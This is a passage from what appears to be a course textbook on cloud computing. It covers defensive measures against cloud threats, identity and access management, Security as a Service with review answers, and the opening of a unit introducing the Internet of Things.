Account or service hijacking can be avoided by adopting different security


features on cloud network. These include employing intrusion detection
systems (IDS) in cloud to monitor network traffic and nodes for detecting
malicious activities. Intrusion detection and other network security systems
must be designed by considering the cloud efficiency, compatibility and
virtualization based context. An IDS system for cloud was designed by
combining system level virtualization and virtual machine monitor
(responsible for managing VMs) techniques. In this architecture, the IDSs are
based on VMs and the sensor connectors on Snort which is a well-known IDS.
VM status and their workload are monitored by IDS and they can be started,
stopped and recovered at any time by management system of IDS. Identity and
access management should also be implemented properly to avoid access to
credentials. To avoid account hijacking threats, multi factor authentication for
remote access using at least two credentials can be used. A technique that uses
multi-level authentication at different levels through passwords was made to
access the cloud services. First the user is authenticated by the cloud access
password and in the next level the service access password of user is verified.
17
Resource Provisioning,
Load Balancing and Moreover, user access to cloud services and applications should be approved
Security by cloud management. The auditing of all the privileged activities of the user
along with information security events generated from it should also be done to
avoid these threats.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of threat:

 Appropriate understanding of security policies and SLAs.


 A strong multifactor authentication to provide an extra security check
for the identification of genuine customers and make the cloud
environment more secure and reliable.
 Strict and continuous monitoring to detect unauthorized activities.
 Prevention of credentials being shared among customers and services.

7.5.4 Protection from Denial of Service (DoS) Attacks

To avoid DOS attacks it is important to identify and implement all the basic
security requirements of cloud network, applications, databases, and other
services. Applications should be tested after designing to verify that they have
no loop holes that can be exploited by the attackers. The DDoS attacks can be
prevented by having extra network bandwidth, using IDS that verify network
requests before reaching cloud server, and maintaining a backup of IP pools for
urgent cases. Industrial solutions to prevent DDOS attacks have also been
provided by different vendors. A technique named hop count filtering that can
be used to filter spoofed IP packets, and helps in decreasing DOS attacks by
90%. Another technique for securing cloud from DDoS involves using
intrusion detection system in virtual machine (VM). In this scheme when an
intrusion detection system (IDS) detects an abnormal increase in inbound
traffic, the targeted applications are transferred to VMs hosted on another data
center.

7.5.5 Protection from Insecure Interfaces and APIs

To protect the cloud from insecure API threats it is important for the
developers to design these APIs by following the principles of trusted
computing. Cloud providers must also ensure that all the all the APIs
implemented in cloud are designed securely, and check them before
deployment for possible flaws. Strong authentication mechanisms and access
controls must also be implemented to secure data and services from insecure
interfaces and APIs. The Open Web Application Security Project (OWASP)
provides standards and guidelines to develop secure applications that can help
in avoiding such application threats. Moreover, it is the responsibility of
customers to analyze the interfaces and APIs of cloud provider before moving
their data to cloud.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of insecure interfaces and API’s threat:

 Robust authentication and access control methods need to be adopted.


 There need to be encryption of the transmitted data.
 Analysis of the cloud provider interfaces and a proper security model
for these interfaces.
18
Security Issues in
 Detailed understanding of the dependency chain related to APIs. Cloud Computing

7.5.6 Protection from Malicious Insiders

The protection from these threats can be achieved by limiting the hardware and
infrastructure access only to the authorized personnel. The service provider
must implement strong access control, and segregation of duties in the
management layer to restrict administrator access to only his authorized data
and software. Auditing on the employees should also be implemented to check
for their suspicious behavior. Moreover, the employee behavior requirements
should be made part of legal contract, and action should be taken against
anyone involved in malicious activities. To prevent data from malicious
insiders encryption can also be implemented in storage, and public networks.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of threat:

 Apply human resource management as part of a legal agreement.


 Institute a compliance reporting system to help determine the security
breach notification so that appropriate action may be taken against a
person who has committed a fraud.
 Non-disclosure of the employees’ privileges and how they are
monitored.
 Conduct a comprehensive supplier assessment.
 Need to adopt, transparency of the information security and
management practices.

7.5.7 Protection from Abuse of Cloud Services

The implementation of strict initial registration and validation processes can


help in identifying malicious consumers. The policies for the protection of
important assets of organization must also be made part of the service level
agreement (SLA) between user and service provider. This will familiarize user
about the possible legal actions that can be conducted against him in case he
violates the agreement. The Service Level Agreement definition language
(SLAng) enables to provide features for SLA monitoring, enforcement and
validation. Moreover, the network monitoring should be comprehensive for
detecting malicious packets and all the updated security devices in network
should be installed.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of threat:

 Strong authorization and authentication mechanisms.


 Continuous examination of the network traffic.

7.5.8 Protection from Insufficient Due Diligence

It is important for organizations to fully understand the scope of risks


associated with cloud before shifting their business and critical assets such as
data to it. The service providers must disclose the applicable logs,
infrastructure such as firewall to consumers to take measures for securing their
applications and data. Moreover, the provider must setup requirements for
19
Resource Provisioning,
Load Balancing and implementing cloud applications, and services using industry standards. Cloud
Security provider should also perform risk assessment using qualitative and quantitative
methods after certain intervals to check the storage, flow, and processing of
data.

7.5.9 Protection from Shared Technology Vulnerabilities

In cloud architecture, hypervisor is responsible for mediating interactions of


virtual machines and the physical hardware. Therefore, hypervisor must be
secured to ensure proper functioning of other virtualization components, and
implementing isolation between virtual machines (VMs). Moreover, to avoid
shared technology threats in cloud a strategy must be developed and
implemented for all the service models that include infrastructure, platform,
software, and user security. The baseline requirements for all cloud
components must be created, and employed in design of cloud architecture.
The service provider should also monitor the vulnerabilities in the cloud
environment, and release patches to fix those vulnerabilities regularly.

In a nutshell, organizations should apply the following mitigation techniques to


protect against this type of threat:

 Apply good authentication and access control methods.


 Monitor the cloud environment for unauthorized activities.
 Use SLAs for patching the weakness remediation, vulnerability
scanning, and configuration reviews.

7.5.10 Protection from SQL Injection, XSS, Google Hacking and Forced
Hacking

In order to secure cloud against various security threats such as: SQL injection,
Cross Site Scripting (XSS), DoS and DDoS attacks, Google Hacking, and
Forced Hacking, different cloud service providers adopt different techniques.
A few standard techniques to detect the above mentioned attacks include:

 Avoiding the usage of dynamically generated SQL in the code


 Finding the meta-structures used in the code
 Validating all user entered parameters, and
 Disallowing and removal of unwanted data and characters, etc..

A generic security framework needs to be worked out for an optimized cost


performance ratio. The main criterion to be fulfilled by the generic security
framework is to interface with any type of cloud environment, and to be able to
handle and detect predefined as well as customized security policies. A similar
approach is being used by Symantec Message Labs Web Security cloud that
blocks the security threats originating from internet and filters the data before
they reach the network. Web security cloud’s security architecture rests on two
components:

Multi-layer Security: In order to ensure data security and block possible


malwares, it consists of multilayer security and hence it has a strong security
platform.

20
Security Issues in
URL filtering: It is being observed that the attacks are launched through Cloud Computing
various web pages and internet sites and hence filtering of the web-pages
ensures that no such harmful or threat carrying web pages are accessible. Also,
content from undesirable sites can be blocked.

With its adaptable technology, it provides security even in highly conflicting


environments and ensures protection against new and converging malware
threats. The security model of Amazon Web Services, one of the biggest cloud
service providers in the market makes use of multi-factor authentication
technique, ensuring enhanced control over AWS account settings and the
management of AWS services and resources for which the account is
subscribed. In case the customer opts for Multi Factor Authentication (MFA),
he has to provide a 6-digit code in addition to their username and password
before access is granted to AWS account or services. This single use code can
be received on mobile devices every time he tries to login into his/her AWS
account. Such a technique is called multi-factor authentication, because two
factors are checked before access is granted.

A Google hacking database identifies the various types of information such as:
login passwords, pages containing logon portals, session usage information etc.
Various software solutions such as Web Vulnerability Scanner can be used to
detect the possibility of a Google hack. In order to prevent Google hack, users
need to ensure that only those information that do not affect them should be
shared with Google. This would prevent sharing of any sensitive information
that may result in adverse conditions.

7.5.11 Protection from IP Spoofing

In case of IP spoofing an attacker tries to spoof authorized users creating an


impression that the packets are coming from reliable sources. Thus the attacker
takes control over the client’s data or system showing himself/herself as the
trusted party. Spoofing attacks can be checked by using encryption techniques
and performing user authentication based on Key exchange. Techniques like
IPSec do help in mitigating the risks of spoofing. By enabling encryption for
sessions and performing filtering for incoming and outgoing packets, spoofing
attacks can be reduced.

7.6 IDENTITY AND ACCESS MANAGEMENT


(IAM)

Identity and access management (IAM) is a framework of business processes,


policies and technologies that facilitates the management of electronic or
digital identities. With an IAM framework in place, information technology
(IT) managers can control user access to critical information within their
organizations. Systems used for IAM include single sign-on systems, two-
factor authentication, multifactor authentication and privileged access
management. These technologies also provide the ability to securely store
identity and profile data as well as data governance functions to ensure that
only data that is necessary and relevant is shared. IAM systems can be
deployed on premises, provided by a third-party vendor through a cloud-based
subscription model or deployed in a hybrid model.

21
Resource Provisioning,
Load Balancing and On a fundamental level, Identity and Access Management encompasses the
Security following components:

 how individuals are identified in a system (understand the


difference between identity management and authentication)

 how roles are identified in a system and how they are assigned to
individuals

 adding, removing and updating individuals and their roles in a system

 assigning levels of access to individuals or groups of individuals, and

 protecting the sensitive data within the system and securing the system
itself.

7.6.1 Benefits of IAM

IAM technologies can be used to initiate, capture, record and manage user
identities and their related access permissions in an automated manner. An
organization gains the following IAM benefits:

 Access privileges are granted according to policy, and all individuals


and services are properly authenticated, authorized and audited.

 Companies that properly manage identities have greater control of user


access, which reduces the risk of internal and external data breaches.

 Automating IAM systems allows businesses to operate more efficiently


by decreasing the effort, time and money that would be required to
manually manage access to their networks.

 In terms of security, the use of an IAM framework can make it easier to


enforce policies around user authentication, validation and privileges,
and address issues regarding privilege creep.

 IAM systems help companies better comply with government


regulations by allowing them to show corporate information is not
being misused. Companies can also demonstrate that any data needed
for auditing can be made available on demand.

7.6.2 Types of Digital Authentication

With IAM, enterprises can implement a range of digital authentication


methods to prove digital identity and authorize access to corporate resources.

Unique passwords: The most common type of digital authentication is the


unique password. To make passwords more secure, some organizations require
longer or complex passwords that require a combination of letters, symbols
and numbers. Unless users can automatically gather their collection of
passwords behind a single sign-on entry point, they typically find remembering
unique passwords onerous.

22
Security Issues in
Pre-Shared Key (PSK): PSK is another type of digital authentication where Cloud Computing
the password is shared among users authorized to access the same resources --
think of a branch office Wi-Fi password. This type of authentication is less
secure than individual passwords. A concern with shared passwords like PSK
is that frequently changing them can be cumbersome.

Behavioral Authentication: When dealing with highly sensitive information


and systems, organizations can use behavioral authentication to get far more
granular and analyze keystroke dynamics or mouse-use characteristics. By
applying artificial intelligence, a trend in IAM systems, organizations can
quickly recognize if user or machine behavior falls outside of the norm and can
automatically lock down systems.

Biometrics: Modern IAM systems use biometrics for more precise


authentication. For instance, they collect a range of biometric characteristics,
including fingerprints, irises, faces, palms, gaits, voices and, in some cases,
DNA. Biometrics and behavior-based analytics have been found to be more
effective than passwords.

7.6.3 IAM and Cloud Security

In cloud computing, data is stored remotely and accessed over the Internet.
Because users can connect to the Internet from almost any location and any
device, most cloud services are device- and location-agnostic. Users no longer
need to be in the office or on a company-owned device to access the cloud.
And in fact, remote workforces are becoming more common.

As a result, identity becomes the most important point of controlling access,


not the network perimeter. One component of a strong security posture takes
on a particularly critical role in the cloud is the identity. The concept of identity
in the cloud can refer to many things, but in this unit we will focus on two
main entities: users and cloud resources.

The user's identity, not their device or location, determines what cloud data
they can access and whether they can have any access at all.

With cloud computing, sensitive files are stored in a remote cloud server.
Because employees of the company need to access the files, they do so by
logging in via browser or an app. IAM helps prevent identity-based attacks and
data breaches that come from privilege escalations (when an unauthorized user
has too much access). Thus, IAM systems are essential for cloud computing,
and for managing remote teams. It is a cloud service that controls the
permissions and access for users and cloud resources. IAM policies are sets of
permission policies that can be attached to either users or cloud resources to
authorize what they access and what they can do with it.

The concept “identity is the new perimeter” goes, when AWS first announced
their IAM service in 2012. We are now witnessing a renewed focus on IAM
due to the rise of abstracted cloud services and the recent wave of high-profile
data breaches.

Services that don’t expose any underlying infrastructure rely heavily on IAM
for security. Managing a large number of privileged users with access to an

23
Resource Provisioning,
Load Balancing and ever-expanding set of services is challenging. Managing separate IAM roles
Security and groups for these users and resources adds yet another layer of complexity.
Cloud providers like AWS and Google Cloud help customers solve these
problems with tools like the Google Cloud- IAM recommender (currently in
beta) and the AWS- IAM access advisor. These tools attempt to analyze the
services last accessed by users and resources, and help you find out which
permissions might be over-privileged. These tools indicate that cloud providers
recognize these access challenges, which is definitely a step in the right
direction. However, there are a few more challenges we need to consider.

7.6.4 Challenges in IAM

Following are some of the challenges in using identity and access


management:

 IAM and Single-Sign-On (SSO): Most businesses today use some


form of single sign-on (SSO), such as Okta, to manage the way users
interact with cloud services. This is an effective way of centralizing
access across a large number of users and services. While using SSO to
log into public cloud accounts is definitely the best practice, the
mapping between SSO users and IAM roles can become challenging, as
users can have multiple roles that span several cloud accounts.

 Effective Permissions: Considering that users and services have more


than one permission-set attached to them, understanding the effective
permissions of an entity becomes difficult.
o What can s/he access?
o Which actions can s/he perform on these services?
o If s/he accesses a virtual machine, does s/he inherit the IAM
permissions of that resource?
o Is s/he part of a group that grants her additional permissions?
o With layers upon layers of configurations and permission
profiles, questions like these become difficult to answer.
o
 Multi-cloud: According to RightScale, more than 84% of organizations
use a multi-cloud strategy. Each provider has its own policies, tools and
terminology. There is no common language that helps you understand
relationships and permissions across cloud providers.

7.6.5 Right Use of IAM Security

IAM is crucial aspect of cloud security. Businesses must look at IAM as a part
of their overall security posture and add an integrated layer of security across
their application lifecycle.

Cloud providers deliver a great baseline for implementing a least-privileged


approach to permissions. As cloud adoption scales in your organization, the
challenges mentioned above and more will become apparent, and you might
need to look at multi-cloud solutions to solve them. Some important aspects
are as follows:

 Don’t use root accounts - Always create individual IAM users with
relevant permissions, and don’t give your root credentials to anyone.
24
Security Issues in
 Adopt a role-per-group model - Assign policies to groups of users Cloud Computing
based on the specific things those users need to do. Don’t “stack” IAM
roles by assigning roles to individual users and then adding them to
groups. This will make it hard for you to understand their effective
permissions.

 Grant least-privilege - Only grant the least amount of permissions


needed for a job, just like we discussed with the Lambda function
accessing DynamoDB. This will ensure that if a user or resource is
compromised, the blast radius is reduced to the one or few things that
entity was permitted to do. This is an ongoing task. As your application
is constantly changing, you need to make sure that your permissions
adapt accordingly.

 Leverage cloud provider tools - Managing many permission profiles


at scale is challenging. Leverage the platforms you are already using to
generate least-privilege permission sets and analyze your existing
services. Remember that the cloud provider recommendation is to
always manually review the generated profiles before implementing
them.

7.7 SECURITY AS A SERVICE (SECaaS)

Security as a Service (SECaaS) can most easily be described as a cloud


delivered model for outsourcing security/cybersecurity services. Much like
Software as a Service, SECaaS provides security services on a subscription
basis hosted by cloud providers. Security as Service solutions have become
increasingly popular for corporate infrastructures as a way to ease the in-house
security team’s responsibilities, scale security needs as the businesses grows,
and avoid the costs and maintenance of on-premise alternatives.

7.7.1 Benefits of SECaaS

Following are some of the benefits of the SECaaS:

 Cost Savings: One of the biggest benefits of a Security as a Service


model is that it saves money. A cloud delivered service is often
available in subscription tiers with several upgrade options so a
business only pays for what they need, when they need. It also
eliminates the need for expertise.
 The Latest Security Tools and Updates: When you implement
SECaaS, you get to work with the latest security tools and resources.
For anti-virus and other security tools to be effective, they must be kept
up to date with the latest patches and virus definitions. By deploying
SECaaS throughout your organization, these updates are managed for
you on every server, PC and mobile device.
 Faster Provisioning and Greater Agility: One of the best things
about as-a-service solutions is that your users can be given access to
these tools immediately. SECaaS solutions can be scaled up or down as
required and are provided on demand where and when you need them.
That means no more uncertainty when it comes to deployment or

25
Resource Provisioning,
Load Balancing and updates as everything is managed for you by your SECaaS provider and
Security visible to you through a web-enabled dashboard.
 Free Up Resources: When security provisions are managed externally,
your IT teams can focus on what is important to your organization.
SECaaS frees up resources, gives you total visibility through
management dashboards and the confidence that your IT security is
being managed competently by a team of outsourced security
specialists. You can also choose for your IT teams to take control of
security processes if you prefer and manage all policy and system
changes through a web interface.

Examples of SECaaS include the security services like:

 Continuous Monitoring
 Data Loss Prevention (DLP)
 Business Continuity and Disaster Recovery (BC/DR or BCDR)
 Email Security
 Antivirus Management
 Spam Filtering
 Identity and Access Management (IAM)
 Intrusion Protection
 Security Assessment
 Network Security
 Security Information and Event Management (SIEM)
 Web Security
 Vulnerability Scanning

 Check Your Progress 1


1) How to secure the Cloud?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
2) What are the various security aspects that one needs to remember while
opting for Cloud services?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………
3) How to choose a SECaaS Provider?

…………………………………………………………………………………
…………………………………………………………………………………
…………………………………………………………………………………

26
Security Issues in
Cloud Computing
7.8 SUMMARY

Cloud computing is getting widely adopted in businesses around the world.


However, there are different security issues associated with it. In order to
maintain the trust of customers, security should be considered as an integral
part of cloud. In this Unit we have focused on most severe threats on cloud
computing that are considered relevant by most users and businesses. We have
divided these threats into categories of data threats, networks threats, and cloud
environment specific threats. The impact of these threats on cloud users and
providers has been illustrated in this unit. Moreover, we also discuss the
security techniques that can be adopted to avoid these threats. Also, towards
the end we had discussed the IAM and SECaaS.

7.9 SOLUTIONS / ANSWERS

Check Your Progress 1

1. In the 1990s, business and personal data stored locally and security was
local as well. Data would be located on a PC’s internal storage at home,
and on enterprise servers, if you worked for a company.

Introducing cloud technology has forced everyone to reevaluate cyber


security. Your data and applications might be floating between local
and remote systems and always Internet-accessible. For example, if you
are accessing Google Docs on your smartphone, or using Salesforce
software to look after your customers, that data could be held
anywhere. Therefore, protecting it becomes more difficult than when it
was just a question of stopping unwanted users from gaining access to
your network. Cloud security requires adjusting some previous IT
practices, but it has become more essential for two key reasons:

Convenience over security: Cloud computing is exponentially


growing as a primary method for both workplace and individual use.
Innovation has allowed new technology to be implemented quicker
than industry security standards can keep up, putting more
responsibility on users and providers to consider the risks of
accessibility.

Centralization and multi-tenant storage: Every component from core


infrastructure to small data like emails and documents — can now be
located and accessed remotely on 24X7 web-based connections. All
this data gathering in the servers of a few major service providers can
be highly dangerous. Threat actors can now target large multi-
organizational data centers and cause immense data breaches.

Unfortunately, malicious actors realize the value of cloud-based targets


and increasingly probe them for exploits. Despite cloud providers
taking many security roles from clients, they do not manage everything.
This leaves even non-technical users with the duty to self-educate on
cloud security.

27
Resource Provisioning,
Load Balancing and That said, users are not alone in cloud security responsibilities. Being
Security aware of the scope of your security duties will help the entire system
stay much safer.

2. Every cloud security measure works to accomplish one or more of the


following:

 Enable data recovery in case of data loss


 Protect storage and networks against malicious data theft
 Deter human error or negligence that causes data leaks
 Reduce the impact of any data or system compromise

Data security is an aspect of cloud security that involves the technical end
of threat prevention. Tools and technologies allow providers and clients to
insert barriers between the access and visibility of sensitive data. Among
these, encryption is one of the most powerful tools available. Encryption
scrambles your data so that it's only readable by someone who has the
encryption key. If your data is lost or stolen, it will be effectively
unreadable and meaningless. Data transit protections like virtual private
networks (VPNs) are also emphasized in cloud networks.

Identity and access management (IAM) pertains to the accessibility


privileges offered to user accounts. Managing authentication and
authorization of user accounts also apply here. Access controls are pivotal
to restrict users — both legitimate and malicious — from entering and
compromising sensitive data and systems. Password Management, multi-
factor authentication, and other methods fall in the scope of IAM.

Governance focuses on policies for threat prevention, detection, and


mitigation. With SMB and enterprises, aspects like threat intel can help
with tracking and prioritizing threats to keep essential systems guarded
carefully. However, even individual cloud clients could benefit from
valuing safe user behavior policies and training. These apply mostly in
organizational environments, but rules for safe use and response to threats
can be helpful to any user.

Data retention (DR) and business continuity (BC) planning involve


technical disaster recovery measures in case of data loss. Central to any DR
and BC plan are methods for data redundancy such as backups.
Additionally, having technical systems for ensuring uninterrupted
operations can help. Frameworks for testing the validity of backups and
detailed employee recovery instructions are just as valuable for a thorough
business continuity plan.

Legal compliance revolves around protecting user privacy as set by


legislative bodies. Governments have taken up the importance of protecting
private user information from being exploited for profit. As such,
organizations must follow regulations to abide by these policies. One
approach is the use of data masking, which obscures identity within data
via encryption methods.

3. Some common cloud security risks/threats include:


28
Security Issues in
 Risks of cloud-based infrastructure including incompatible legacy IT Cloud Computing
frameworks, and third-party data storage service disruptions.
 Internal threats due to human error such as misconfiguration of user
access controls.
 External threats caused almost exclusively by malicious actors, such
as malware, phishing, and DDoS attacks.

The biggest risk with the cloud is that there is no perimeter. Traditional
cyber security focused on protecting the perimeter, but cloud environments
are highly connected which means insecure APIs (Application
Programming Interfaces) and account hijacks can pose real problems.
Faced with cloud computing security risks, cyber security professionals
need to shift to a data-centric approach.

Interconnectedness also poses problems for networks. Malicious actors


often breach networks through compromised or weak credentials. Once a
hacker manages to make a landing, they can easily expand and use poorly
protected interfaces in the cloud to locate data on different databases or
nodes. They can even use their own cloud servers as a destination where
they can export and store any stolen data.

Third-party storage of your data and access via the internet each pose their
own threats as well. If for some reason those services are interrupted, your
access to the data may be lost. For instance, a phone network outage could
mean you can't access the cloud at an essential time. Alternatively, a power
outage could affect the data center where your data is stored, possibly with
permanent data loss.

Such interruptions could have long-term repercussions. A recent power


outage at an Amazon cloud data facility resulted in data loss for some
customers when servers incurred hardware damage. This is a good example
of why you should have local backups of at least some of your data and
applications.

Check Your Progress 2

1. Fortunately, there is a lot that you can do to protect your own data in
the cloud. Let’s explore some of the popular methods.

Encryption is one of the best ways to secure your cloud computing


systems. There are several different ways of using encryption, and they
may be offered by a cloud provider or by a separate cloud security
solutions provider:
 Communications encryption with the cloud in their entirety.
 Particularly sensitive data encryption, such as account credentials.
 End-to-end encryption of all data that is uploaded to the cloud.

Within the cloud, data is more at risk of being intercepted when it is on the
move. When it's moving between one storage location and another, or
being transmitted to your on-site application, it's vulnerable. Therefore,
end-to-end encryption is the best cloud security solution for critical data.
With end-to-end encryption, at no point is your communication made
available to outsiders without your encryption key.
29
Resource Provisioning,
Load Balancing and You can either encrypt your data yourself before storing it on the cloud, or
Security you can use a cloud provider that will encrypt your data as part of the
service. However, if you are only using the cloud to store non-sensitive
data such as corporate graphics or videos, end-to-end encryption might be
overkill. On the other hand, for financial, confidential, or commercially
sensitive information, it is vital.

If you are using encryption, remember that the safe and secure
management of your encryption keys is crucial. Keep a key backup and
ideally don't keep it in the cloud. You might also want to change your
encryption keys regularly so that if someone gains access to them, they will
be locked out of the system when you make the changeover.

Configuration is another powerful practice in cloud security. Many cloud


data breaches come from basic vulnerabilities such as misconfiguration
errors. By preventing them, you are vastly decreasing your cloud security
risk. If you don’t feel confident doing this alone, you may want to consider
using a separate cloud security solutions provider.

Here are a few principles you can follow:

 Never leave the default settings unchanged: Using the default settings
gives a hacker front-door access. Avoid doing this to complicate a
hacker’s path into your system.
 Never leave a cloud storage bucket open: An open bucket could allow
hackers to see the content just by opening the storage bucket's URL.
 If the cloud vendor gives you security controls that you can switch
on, use them. Not selecting the right security options can put you at
risk.

2. Security should be one of the main points to consider when it comes to


choosing a cloud security provider. That’s because your cyber security is
no longer just your responsibility: cloud security companies must do their
part in creating a secure cloud environment and share the responsibility for
data security.

Unfortunately, cloud companies are not going to give you the blueprints to
their network security. This would be equivalent to a bank providing you
with details of their vault, complete with the combination numbers to the
safe.

However, getting the right answers to some basic questions gives you
better confidence that your cloud assets will be safe. In addition, you will
be more aware of whether your provider has properly addressed obvious
cloud security risks. We recommend asking your cloud provider some
questions of the following questions:

 Security audits: “Do you conduct regular external audits of your


security?”
 Data segmentation: “Is customer data is logically segmented and kept
separate?”
 Encryption: “Is our data encrypted? What parts of it are encrypted?”

30
Security Issues in
 Customer data retention: “What customer data retention policies are Cloud Computing
being followed?”
 User data retention: “Is my data is properly deleted if I leave your
cloud service?”
 Access management: “How are access rights controlled?”

You will also want to make sure you’ve read your provider’s terms of
service (TOS). Reading the TOS is essential to understanding if you are
receiving exactly what you want and need.

Be sure to check that you also know all the services used with your
provider. If your files are on Dropbox or backed up on iCloud (Apple's
storage cloud), that may well mean they are actually held on Amazon's
servers. So, you will need to check out AWS, as well as, the service you
are using directly.

3. Hiring the third party cloud service for the security of your most critical
and sensitive business assets is a massive undertaking. Choosing a SECaaS
provider takes careful consideration and evaluation. Here are some of the
most important considerations when selecting a provider:

 Availability: Your network must be available 24 hours a day and so


should your SECaaS provider. Vet out the vendor’s SLA to make sure
they can provide the uptime your business needs and to know how
outages are handled.

 Fast Response Times: Fast response times are just as important as


availability. Look for providers that offer guaranteed response times for
incidents, queries and system updates.

 Disaster Recovery Planning: Your provider should work closely with


you to understand the vulnerabilities of your infrastructure and the
external threats that are most likely to cause the most damage. From
vandalism to weather disasters, your provider should ensure your
business can recover quickly from these disruptive events.

 Vendor Partnerships: A SECaaS provider is only ever as good as the


vendors that have forged partnerships with. Look for providers that
work with best in class security solution vendors and who also have the
expertise to support these solutions.

7.10 FURTHER READINGS

1. Cloud Computing: Principles and Paradigms, Rajkumar Buyya, James


Broberg and Andrzej M. Goscinski, Wiley, 2011.
2. Mastering Cloud Computing, Rajkumar Buyya, Christian Vecchiola,
and Thamarai Selvi, Tata McGraw Hill, 2013.
3. Essentials of cloud Computing: K. Chandrasekhran, CRC press, 2014.
4. Cloud Computing, Sandeep Bhowmik, Cambridge University Press,
2017.

31
Unit 8: Internet of Things: An Introduction

8.1. Introduction to IoT

Internet of Things (IoT) is a massive network of physical devices embedded with sensors,
software, electronics, and network which allows the devices to exchange or collect data and
perform certain actions.

Simply put, IoT is made up of two words: Internet & Things.

 Things – physical devices, appliances, gadgets, etc.


 Internet – through which these devices are connected

IoT aims at extending internet connectivity beyond computers and smartphones to other
devices people use at home or for business. The technology allows devices to get controlled
across network infrastructure remotely. As a result, it cuts down the human effort and paves
the way for accessing the connected devices easily. With autonomous control, the devices are
operable without involving human interaction. IoT makes things virtually smart through AI
algorithms, data collection, and networks enhancing our lives.

Examples: Pet tracking devices, diabetes monitors, AC sensors to adjust the temperature
based on the outside temperature, smart wearables, and more.

IoT comprises things that have unique identities and are connected to internet. By 2020 there
will be a total of 50 billion devices /things connected to internet. IoT is not limited to just
connecting things to the internet but also allow things to communicate and exchange data.
Definition: A dynamic global n/w infrastructure with self -configuring capabilities based on
standard and interoperable communication protocols where physical and virtual ―things‖
have identities, physical attributes and virtual personalities and use intelligent interfaces, and
are seamlessly integrated into information n/w, often communicate data associated with users
and their environments.

8.2.Characteristics of IoT
1) Dynamic & Self Adapting: IoT devices and systems may have the capability
to dynamically adapt with the changing contexts and take actions based on their
operating conditions, user‘s context or sensed environment. Eg: the surveillance
system is adapting itself based on context and changing conditions.
2) Self Configuring: allowing a large number of devices to work together to
provide certain functionality.
3) Inter Operable Communication Protocols: support a number of interoperable
communication protocols and can communicate with other devices and also with
infrastructure.
4) Unique Identity: Each IoT device has a unique identity and a unique identifier
(IP address).
5) Integrated into Information Network: that allow them to communicate and
exchange data with other devices and systems.

8.3. IoT Categories:


1. Consumer IoT (CIoT) refers to the use of IoT for consumer applications and devices.
Common CIoT products include smartphones, wearables, smart assistants, home
appliances, etc. Typically, CIoT solutions leverage Wi-Fi, Bluetooth, and ZigBee to
facilitate connectivity. These technologies offer short-range communication suitable for
deployments in smaller venues, such as homes and offices.

While CIoT tends to focus on augmenting personal and home environments,


Commercial IoT goes a bit further, delivering the benefits of IoT to larger venues. Think:
commercial office buildings, supermarkets, stores, hotels, healthcare facilities, and
entertainment venues.

There are numerous use cases for commercial IoT, including monitoring environmental
conditions, managing access to corporate facilities, and economizing utilities and
consumption in hotels and other large venues. Many Commercial IoT solutions are geared
towards improving customer experiences and business conditions.

2. Industrial IoT (IIoT), is perhaps the most dynamic wing of the IoT industry. Its focus is
on augmenting existing industrial systems, making them both more productive and more
efficient. IIoT deployments are typically found in large-scale factories and manufacturing
plants and are often associated with industries like healthcare, agriculture, automotive,
and logistics. The Industrial Internet is perhaps the most well-known example of IIoT.

3. Infrastructure IoT is concerned with the development of smart infrastructures that


incorporate IoT technologies to boost efficiency, cost savings, maintenance, etc. This
includes the ability to monitor and control operations of urban and rural infrastructures,
such as bridges, railway tracks, and on- and offshore windfarms. Technically speaking,
infrastructure IoT is a subset of IIoT. However, due to its significance, it’s often treated
as its own separate thing.
4. The last type of IoT is the Internet of Military Things (IoMT), often referred to as
Battlefield IoT, the Internet of Battlefield Things, or simply IoBT. IoMT is precisely
what it sounds like — the use of IoT in military settings and battlefield situations. It is
chiefly aimed at increasing situational awareness, bolstering risk assessment, and
improving response times. Common IoMT applications include connecting ships, planes,
tanks, soldiers, drones, and even Forward Operating Bases via an interconnected
system. In addition, IoMT produces data that can be leveraged to improve military
practices, systems, equipment, and strategy.

8.4. IoT Enablers and Connectivity Layers

System installers, repairers, craftsmen, electricians, plumbers, architects who connect devices
and systems to the Internet for personal use and for commercial and other business uses.
As the Internet of Things (IoT) enables devices to make intelligent decisions that generate
positive business outcomes, it’s the sensors that enable those decisions. As cost and time-to-
market pressures continue to rise, sensors provide greater visibility into connected systems
and empower those systems to react intelligently to changes driven by both external forces
and internal factors. Sensors are the components that provide the actionable insights that
power the IoT and enable organizations to make more effective business decisions. It’s
through this real-time measurement that the IoT can transform an organization’s ability to
react to change.

Wi-Fi was designed for computers, and 4G LTE wireless targeted smartphones and portable
devices. Both have been tremendously successful — and both were shaped by the devices
they were intended for. The same goes for 5G, the first generation of wireless technology
designed with extremely small, low-power, and near-ubiquitous IoT devices in mind. Unlike
Wi-Fi and LTE devices, which we handle and plug into power sources on a daily basis, IoT
sensors will operate autonomously for years at a time, often in inaccessible places, without
recharging or replacement. An explosion of new protocols: The IoT is prompting the
development of a number of different 5G communication standards, not just one or two
network types

8.4.Baseline Technologies of IoT

According to Jones, the top 10 emerging IoT technologies are:

1. IoT Security: Security technologies will be required to protect IoT devices and platforms
from both information attacks and physical tampering, to encrypt their communications, and
to address new challenges such as impersonating "things" or denial-of-sleep attacks that drain
batteries. IoT security will be complicated by the fact that many "things" use simple
processors and operating systems that may not support sophisticated security approaches.

2. IoT Analytics: IoT business models will exploit the information collected by "things" in
many ways, which will demand new analytic tools and algorithms. As data volumes increase
over the next five years, the needs of the IoT may diverge further from traditional analytics.

3. IoT Device (Thing) Management: Long-lived nontrivial "things" will require


management and monitoring, including device monitoring, firmware and software updates,
diagnostics, crash analysis and reporting, physical management, and security management.
Tools must be capable of managing and monitoring thousands and perhaps even millions of
devices.

4. Low-Power, Short-Range IoT Networks. Low-power, short-range networks will


dominate wireless IoT connectivity through 2025, far outnumbering connections using wide-
area IoT networks. However, commercial and technical trade-offs mean that many solutions
will coexist, with no single dominant winner.
5. Low-Power, Wide-Area Networks. Traditional cellular networks don't deliver a good
combination of technical features and operational cost for those IoT applications that need
wide-area coverage combined with relatively low bandwidth, good battery life, low hardware
and operating cost, and high connection density. Emerging standards such as narrowband IoT
will likely dominate this space.

6. IoT Processors. The processors and architectures used by IoT devices define many of their
capabilities, such as whether they are capable of strong security and encryption, power
